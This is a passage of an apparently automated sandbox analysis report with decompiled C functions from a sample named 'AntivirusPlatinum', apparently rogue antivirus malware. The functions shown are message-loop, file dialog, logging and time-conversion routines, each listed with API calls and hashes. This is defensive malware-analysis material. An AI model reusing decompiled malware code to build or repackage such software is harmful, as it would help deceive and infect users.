                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t29 = _v12;
                                                                                                                                                  				if(_t29 != _t46) {
                                                                                                                                                  					_push( &_v8);
                                                                                                                                                  					_push(0x41282c);
                                                                                                                                                  					_push(_t29);
                                                                                                                                                  					if( *((intOrPtr*)( *_t29))() >= 0) {
                                                                                                                                                  						_t32 = _v8;
                                                                                                                                                  						_push(_t32);
                                                                                                                                                  						if( *((intOrPtr*)( *_t32 + 0x20))() >= 0) {
                                                                                                                                                  							_t36 = _v8;
                                                                                                                                                  							_t46 = _t46 & 0xffffff00 |  *((intOrPtr*)( *_t36 + 0x14))(_t36, _a8) >= 0x00000000;
                                                                                                                                                  						}
                                                                                                                                                  						_t34 = _v8;
                                                                                                                                                  						 *((intOrPtr*)( *_t34 + 8))(_t34);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t46;
                                                                                                                                                  			}














                                                                                                                                                  0x0040650b
                                                                                                                                                  0x0040650e
                                                                                                                                                  0x00406511
                                                                                                                                                  0x00406514
                                                                                                                                                  0x00406516
                                                                                                                                                  0x00406519
                                                                                                                                                  0x0040651c
                                                                                                                                                  0x00406521
                                                                                                                                                  0x00406522
                                                                                                                                                  0x00406528
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406539
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040653b
                                                                                                                                                  0x0040654b
                                                                                                                                                  0x00406554
                                                                                                                                                  0x0040655e
                                                                                                                                                  0x00406568
                                                                                                                                                  0x00406568
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040654b
                                                                                                                                                  0x00406539
                                                                                                                                                  0x00406570
                                                                                                                                                  0x00406575
                                                                                                                                                  0x0040657c
                                                                                                                                                  0x0040657d
                                                                                                                                                  0x00406582
                                                                                                                                                  0x00406587
                                                                                                                                                  0x00406589
                                                                                                                                                  0x0040658e
                                                                                                                                                  0x00406594
                                                                                                                                                  0x00406596
                                                                                                                                                  0x004065a4
                                                                                                                                                  0x004065a4
                                                                                                                                                  0x004065a7
                                                                                                                                                  0x004065ad
                                                                                                                                                  0x004065ad
                                                                                                                                                  0x00406587
                                                                                                                                                  0x004065b6

                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00406514
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040652F
                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00406543
                                                                                                                                                  • GetMessageA.USER32 ref: 00406554
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0040655E
                                                                                                                                                  • DispatchMessageA.USER32 ref: 00406568
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$CountTick$DispatchPeekTranslate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3906477200-0
                                                                                                                                                  • Opcode ID: de4563fddac7f047d422ea89b0fca390a86d69ec7808a870bafdc2c2368130f6
                                                                                                                                                  • Instruction ID: 4ec5337514138466832f045ad94f732bf95921bc87828c57aa0924f33fa4e90b
                                                                                                                                                  • Opcode Fuzzy Hash: de4563fddac7f047d422ea89b0fca390a86d69ec7808a870bafdc2c2368130f6
                                                                                                                                                  • Instruction Fuzzy Hash: 1821E4B1A00109AFDB00DFA5DD88DDEBBBCEE48305B1444AAE502E7294D778DA51CB64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040BB8A(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                  				int _t14;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				char* _t19;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				char* _t23;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				char* _t26;
                                                                                                                                                  
                                                                                                                                                  				while(1) {
                                                                                                                                                  					 *0x419ee0 = _a12;
                                                                                                                                                  					 *0x419ee4 = _a16;
                                                                                                                                                  					 *0x419ed8 = _a20;
                                                                                                                                                  					if( *0x419ede == 0) {
                                                                                                                                                  						if( *0x419edf == 0) {
                                                                                                                                                  							_t14 = DialogBoxParamA( *0x414c74, "REPLACEFILEDLG",  *0x419f80, E0040AE97, _a8);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t14 = 2;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t14 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					_t15 = _t14 - 1;
                                                                                                                                                  					if(_t15 == 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t18 = _t15 - 1;
                                                                                                                                                  					if(_t18 == 0) {
                                                                                                                                                  						L15:
                                                                                                                                                  						_t19 = _a4;
                                                                                                                                                  						 *_t19 = 0x4e;
                                                                                                                                                  						return _t19;
                                                                                                                                                  					}
                                                                                                                                                  					_t20 = _t18 - 1;
                                                                                                                                                  					if(_t20 == 0) {
                                                                                                                                                  						 *0x419ede = 1;
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t21 = _t20 - 1;
                                                                                                                                                  					if(_t21 != 0) {
                                                                                                                                                  						_t22 = _t21 - 1;
                                                                                                                                                  						if(_t22 == 0) {
                                                                                                                                                  							_t23 = _a4;
                                                                                                                                                  							 *0x419f78 = 1;
                                                                                                                                                  							 *_t23 = 0x43;
                                                                                                                                                  							return _t23;
                                                                                                                                                  						}
                                                                                                                                                  						_t24 = _t22 - 1;
                                                                                                                                                  						if(_t24 != 0) {
                                                                                                                                                  							return _t24;
                                                                                                                                                  						}
                                                                                                                                                  						 *0x419edf = 1;
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					if(DialogBoxParamA( *0x414c74, "RENAMEDLG",  *0x419f80, E0040B193, _a8) == 0) {
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					_t26 = _a4;
                                                                                                                                                  					 *_t26 = 0x52;
                                                                                                                                                  					return _t26;
                                                                                                                                                  				}
                                                                                                                                                  				 *_a4 = 0x59;
                                                                                                                                                  				return SetFileAttributesA(_a8, 0);
                                                                                                                                                  			}













                                                                                                                                                  0x0040bb94
                                                                                                                                                  0x0040bb9e
                                                                                                                                                  0x0040bba6
                                                                                                                                                  0x0040bbae
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x0040bbc1
                                                                                                                                                  0x0040bbe1
                                                                                                                                                  0x0040bbc3
                                                                                                                                                  0x0040bbc5
                                                                                                                                                  0x0040bbc5
                                                                                                                                                  0x0040bbb5
                                                                                                                                                  0x0040bbb7
                                                                                                                                                  0x0040bbb7
                                                                                                                                                  0x0040bbe3
                                                                                                                                                  0x0040bbe4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbe6
                                                                                                                                                  0x0040bbe7
                                                                                                                                                  0x0040bc23
                                                                                                                                                  0x0040bc23
                                                                                                                                                  0x0040bc26
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc26
                                                                                                                                                  0x0040bbe9
                                                                                                                                                  0x0040bbea
                                                                                                                                                  0x0040bc3d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc3d
                                                                                                                                                  0x0040bbec
                                                                                                                                                  0x0040bbed
                                                                                                                                                  0x0040bc16
                                                                                                                                                  0x0040bc17
                                                                                                                                                  0x0040bc2b
                                                                                                                                                  0x0040bc2e
                                                                                                                                                  0x0040bc38
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc38
                                                                                                                                                  0x0040bc19
                                                                                                                                                  0x0040bc1a
                                                                                                                                                  0x0040bc57
                                                                                                                                                  0x0040bc57
                                                                                                                                                  0x0040bc1c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc1c
                                                                                                                                                  0x0040bc0c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc0e
                                                                                                                                                  0x0040bc11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc11
                                                                                                                                                  0x0040bc4c
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DialogParam
                                                                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                  • API String ID: 665744214-56093855
                                                                                                                                                  • Opcode ID: ece71fc73592af66301a70e679c12dd9b2103662e6c74d0171aeeb951f2b0c10
                                                                                                                                                  • Instruction ID: 33d4027af350ab9e8ad30dbbcb82d9e90b0d9a51744802c5390a1546dc0066f1
                                                                                                                                                  • Opcode Fuzzy Hash: ece71fc73592af66301a70e679c12dd9b2103662e6c74d0171aeeb951f2b0c10
                                                                                                                                                  • Instruction Fuzzy Hash: 0B213A30158349ABEB12CF14EC10BD63FA0EB15344F188076E945AA3E1CBB9AD50DBAD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E0040B193(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				struct HWND__* _t21;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				CHAR* _t23;
                                                                                                                                                  
                                                                                                                                                  				_t21 = _a4;
                                                                                                                                                  				_t23 = _a16;
                                                                                                                                                  				E0040309D(_t22, _t21, _a8, _a12, _t23, "RENAMEDLG", 0, 0);
                                                                                                                                                  				_t9 = _a8 - 0x110;
                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                  					 *0x41f320 = _t23;
                                                                                                                                                  					SetDlgItemTextA(_t21, 0x65, _t23);
                                                                                                                                                  					SetDlgItemTextA(_t21, 0x66, _t23);
                                                                                                                                                  					L9:
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t9 != 1) {
                                                                                                                                                  					L4:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t17 == 0) {
                                                                                                                                                  					SendDlgItemMessageA(_t21, 0x66, 0xd, 0x50,  *0x41f320);
                                                                                                                                                  					_push(1);
                                                                                                                                                  					L6:
                                                                                                                                                  					EndDialog(_t21, ??);
                                                                                                                                                  					goto L9;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t17 == 1) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					goto L6;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}








                                                                                                                                                  0x0040b197
                                                                                                                                                  0x0040b19c
                                                                                                                                                  0x0040b1b0
                                                                                                                                                  0x0040b1b8
                                                                                                                                                  0x0040b1bd
                                                                                                                                                  0x0040b1fb
                                                                                                                                                  0x0040b201
                                                                                                                                                  0x0040b207
                                                                                                                                                  0x0040b209
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b20b
                                                                                                                                                  0x0040b1c0
                                                                                                                                                  0x0040b1cc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b1cc
                                                                                                                                                  0x0040b1c6
                                                                                                                                                  0x0040b1c7
                                                                                                                                                  0x0040b1e7
                                                                                                                                                  0x0040b1ed
                                                                                                                                                  0x0040b1d1
                                                                                                                                                  0x0040b1d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b1d2
                                                                                                                                                  0x0040b1ca
                                                                                                                                                  0x0040b1d0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b1d0
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040B1D2
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000066,0000000D,00000050,?), ref: 0040B1E7
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B201
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B207
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Item$Text$DialogMessageSend
                                                                                                                                                  • String ID: RENAMEDLG
                                                                                                                                                  • API String ID: 1109518134-3299779563
                                                                                                                                                  • Opcode ID: f0ac5b148682c27e8b841de141a9e01bb37ae873fefba3ba11adc6c704d29104
                                                                                                                                                  • Instruction ID: 19bae5b26799f046c8e57332e4b758996fbe75a27c9b904ad18449bb2b017feb
                                                                                                                                                  • Opcode Fuzzy Hash: f0ac5b148682c27e8b841de141a9e01bb37ae873fefba3ba11adc6c704d29104
                                                                                                                                                  • Instruction Fuzzy Hash: 9A01B172240219B6D7205F669C49EAB3F2CEB497A1F004426BA19B90C1C2BA8421D7FC
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B2A9(CHAR* _a8, char _a12) {
                                                                                                                                                  				char _v4100;
                                                                                                                                                  				char* _t7;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				long _t17;
                                                                                                                                                  
                                                                                                                                                  				_t7 = E00401200(0x1000);
                                                                                                                                                  				if( *0x419f78 == 0) {
                                                                                                                                                  					_t7 = _a8;
                                                                                                                                                  					if( *_t7 != 0) {
                                                                                                                                                  						_t17 = GetLastError();
                                                                                                                                                  						_t2 =  &_a12; // 0x40555d
                                                                                                                                                  						wvsprintfA( &_v4100, _a8, _t2);
                                                                                                                                                  						_t13 = E0040AE5A(0x4122d8,  &_v4100);
                                                                                                                                                  						if(_t17 != 0) {
                                                                                                                                                  							SetLastError(_t17);
                                                                                                                                                  						}
                                                                                                                                                  						return _t13;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t7;
                                                                                                                                                  			}







                                                                                                                                                  0x0040b2b1
                                                                                                                                                  0x0040b2bd
                                                                                                                                                  0x0040b2bf
                                                                                                                                                  0x0040b2c5
                                                                                                                                                  0x0040b2ce
                                                                                                                                                  0x0040b2d0
                                                                                                                                                  0x0040b2de
                                                                                                                                                  0x0040b2f0
                                                                                                                                                  0x0040b2f9
                                                                                                                                                  0x0040b2fc
                                                                                                                                                  0x0040b2fc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b302
                                                                                                                                                  0x0040b2c5
                                                                                                                                                  0x0040b304

                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00414C7C,?,004032F4,00000000,00000000,00000076,?,00000000,00404FA1,00000017,00000000,00000000,004054A9,?), ref: 0040B2C8
                                                                                                                                                  • wvsprintfA.USER32 ref: 0040B2DE
                                                                                                                                                    • Part of subcall function 0040AE5A: wvsprintfA.USER32 ref: 0040AE7B
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,004032F4,00000000,00000000,00000076,?,00000000,00404FA1,00000017,00000000,00000000,004054A9,?), ref: 0040B2FC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastwvsprintf
                                                                                                                                                  • String ID: @Mhv$]U@
                                                                                                                                                  • API String ID: 2157943386-24312942
                                                                                                                                                  • Opcode ID: 05e9acf8f71246b7a0c130bf83baa347096ba25980d1154a7551ccc3d37d6479
                                                                                                                                                  • Instruction ID: d4fdff9da87b2b6eb3902b3be9dba9c97109d9518f32d3958c30564e7a0a465c
                                                                                                                                                  • Opcode Fuzzy Hash: 05e9acf8f71246b7a0c130bf83baa347096ba25980d1154a7551ccc3d37d6479
                                                                                                                                                  • Instruction Fuzzy Hash: 1CF0E23240461CABDB129B24DC08BDE33ACEF09395F1041B6F805E2290C7B89E808B9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406C6F(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                  				void* _t7;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				long _t26;
                                                                                                                                                  				struct HWND__* _t27;
                                                                                                                                                  
                                                                                                                                                  				_t7 = _a8 - 1;
                                                                                                                                                  				_t27 = _a4;
                                                                                                                                                  				_t26 = _a16;
                                                                                                                                                  				if(_t7 == 0) {
                                                                                                                                                  					E00406BCC(__ebx, GetWindowLongA(_t27, 0xffffffeb), __eflags, _t27);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t11 = _t7 - 1;
                                                                                                                                                  					if(_t11 == 0) {
                                                                                                                                                  						E004064B3(GetWindowLongA(_t27, 0xffffffeb));
                                                                                                                                                  					} else {
                                                                                                                                                  						_t14 = _t11 - 3;
                                                                                                                                                  						if(_t14 == 0) {
                                                                                                                                                  							E004064E2(GetWindowLongA(_t27, 0xffffffeb), _t26 & 0x0000ffff, _t26 >> 0x10);
                                                                                                                                                  						} else {
                                                                                                                                                  							if(_t14 == 0x7c) {
                                                                                                                                                  								SetWindowLongA(_t27, 0xffffffeb,  *_t26);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return DefWindowProcA(_t27, _a8, _a12, _t26);
                                                                                                                                                  			}








                                                                                                                                                  0x00406c75
                                                                                                                                                  0x00406c77
                                                                                                                                                  0x00406c7b
                                                                                                                                                  0x00406c7e
                                                                                                                                                  0x00406cd4
                                                                                                                                                  0x00406c80
                                                                                                                                                  0x00406c80
                                                                                                                                                  0x00406c81
                                                                                                                                                  0x00406cc1
                                                                                                                                                  0x00406c83
                                                                                                                                                  0x00406c83
                                                                                                                                                  0x00406c86
                                                                                                                                                  0x00406caf
                                                                                                                                                  0x00406c88
                                                                                                                                                  0x00406c8b
                                                                                                                                                  0x00406c92
                                                                                                                                                  0x00406c92
                                                                                                                                                  0x00406c8b
                                                                                                                                                  0x00406c86
                                                                                                                                                  0x00406c81
                                                                                                                                                  0x00406cea

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Long$Proc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3468714886-0
                                                                                                                                                  • Opcode ID: 1b70b1437c5452307bdbe11857104811a4f517da2f4235cb28a3aaf30c274c68
                                                                                                                                                  • Instruction ID: 61735104a588f96fdd1966c9f8756a4b7932e2efd5c0c580c1dd5b3652aebea8
                                                                                                                                                  • Opcode Fuzzy Hash: 1b70b1437c5452307bdbe11857104811a4f517da2f4235cb28a3aaf30c274c68
                                                                                                                                                  • Instruction Fuzzy Hash: D0018435108024B7DF055F69AE18CAF3B68DE99330712462AF513F22E0C679993196AD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040DF79(void* __ebx, signed int* __ecx, FILETIME* _a4) {
                                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                                  				struct _FILETIME _v20;
                                                                                                                                                  				struct _SYSTEMTIME _v36;
                                                                                                                                                  				signed int _t34;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				signed int _t50;
                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                  				signed int* _t57;
                                                                                                                                                  
                                                                                                                                                  				_t57 = __ecx;
                                                                                                                                                  				FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                                                                                  				FileTimeToSystemTime( &_v12,  &_v36);
                                                                                                                                                  				_t34 = _v36.wDay & 0x0000ffff;
                                                                                                                                                  				_t50 = _v36.wMonth & 0x0000ffff;
                                                                                                                                                  				_t51 = _v36.wYear & 0x0000ffff;
                                                                                                                                                  				_t57[3] = _v36.wHour & 0x0000ffff;
                                                                                                                                                  				_t57[2] = _t34;
                                                                                                                                                  				_t57[4] = _v36.wMinute & 0x0000ffff;
                                                                                                                                                  				_t57[8] = _t34 - 1;
                                                                                                                                                  				_t57[5] = _v36.wSecond & 0x0000ffff;
                                                                                                                                                  				_t37 = 1;
                                                                                                                                                  				 *_t57 = _v36.wYear & 0x0000ffff;
                                                                                                                                                  				_t57[1] = _t50;
                                                                                                                                                  				_t57[7] = _v36.wDayOfWeek & 0x0000ffff;
                                                                                                                                                  				if(_t50 > 1) {
                                                                                                                                                  					_t56 = 0x4140ec;
                                                                                                                                                  					do {
                                                                                                                                                  						_t57[8] = _t57[8] +  *_t56;
                                                                                                                                                  						_t37 = _t37 + 1;
                                                                                                                                                  						_t56 = _t56 + 4;
                                                                                                                                                  					} while (_t37 < _t50);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t50 > 2 && E0040DF44(_t51) != 0) {
                                                                                                                                                  					_t57[8] = _t57[8] + 1;
                                                                                                                                                  				}
                                                                                                                                                  				_v36.wMilliseconds = 0;
                                                                                                                                                  				SystemTimeToFileTime( &_v36,  &_v20);
                                                                                                                                                  				_t57[6] = _v12.dwLowDateTime - _v20.dwLowDateTime;
                                                                                                                                                  				return _t57;
                                                                                                                                                  			}











                                                                                                                                                  0x0040df88
                                                                                                                                                  0x0040df8a
                                                                                                                                                  0x0040df98
                                                                                                                                                  0x0040dfa2
                                                                                                                                                  0x0040dfa6
                                                                                                                                                  0x0040dfaa
                                                                                                                                                  0x0040dfae
                                                                                                                                                  0x0040dfb5
                                                                                                                                                  0x0040dfb8
                                                                                                                                                  0x0040dfc0
                                                                                                                                                  0x0040dfc5
                                                                                                                                                  0x0040dfcc
                                                                                                                                                  0x0040dfcd
                                                                                                                                                  0x0040dfcf
                                                                                                                                                  0x0040dfd2
                                                                                                                                                  0x0040dfd7
                                                                                                                                                  0x0040dfd9
                                                                                                                                                  0x0040dfdf
                                                                                                                                                  0x0040dfe1
                                                                                                                                                  0x0040dfe4
                                                                                                                                                  0x0040dfe5
                                                                                                                                                  0x0040dfe8
                                                                                                                                                  0x0040dfec
                                                                                                                                                  0x0040dff0
                                                                                                                                                  0x0040dffc
                                                                                                                                                  0x0040dffc
                                                                                                                                                  0x0040e001
                                                                                                                                                  0x0040e00d
                                                                                                                                                  0x0040e01a
                                                                                                                                                  0x0040e021

                                                                                                                                                  APIs
                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,01000000,00000000,?,?,?,?), ref: 0040DF8A
                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040DF98
                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E00D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$File$System$Local
                                                                                                                                                  • String ID: @A
                                                                                                                                                  • API String ID: 2859370177-361999007
                                                                                                                                                  • Opcode ID: 89950de3dffe1bcad7401ddb42f8c5d8fd6609ab17a9cf8c41317c6ad1f43135
                                                                                                                                                  • Instruction ID: 1aaad987808f3aa0f3819d0692f069d438d8aa74b184443fbbc98788e9bd99ff
                                                                                                                                                  • Opcode Fuzzy Hash: 89950de3dffe1bcad7401ddb42f8c5d8fd6609ab17a9cf8c41317c6ad1f43135
                                                                                                                                                  • Instruction Fuzzy Hash: 4B212CB5D0021A9BCB64DFA9C8408FFFBF9FE48701B00852BE596E3640E3749554CB64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E0040B3DA(void* __ecx, void* __edx, struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                  				struct HWND__* _t26;
                                                                                                                                                  				CHAR* _t27;
                                                                                                                                                  
                                                                                                                                                  				_t27 = _a16;
                                                                                                                                                  				_t26 = _a4;
                                                                                                                                                  				E0040309D(__edx, _t26, _a8, _a12, _t27, "ASKNEXTVOL", 0, 0);
                                                                                                                                                  				_t9 = _a8 - 0x110;
                                                                                                                                                  				if(_t9 == 0) {
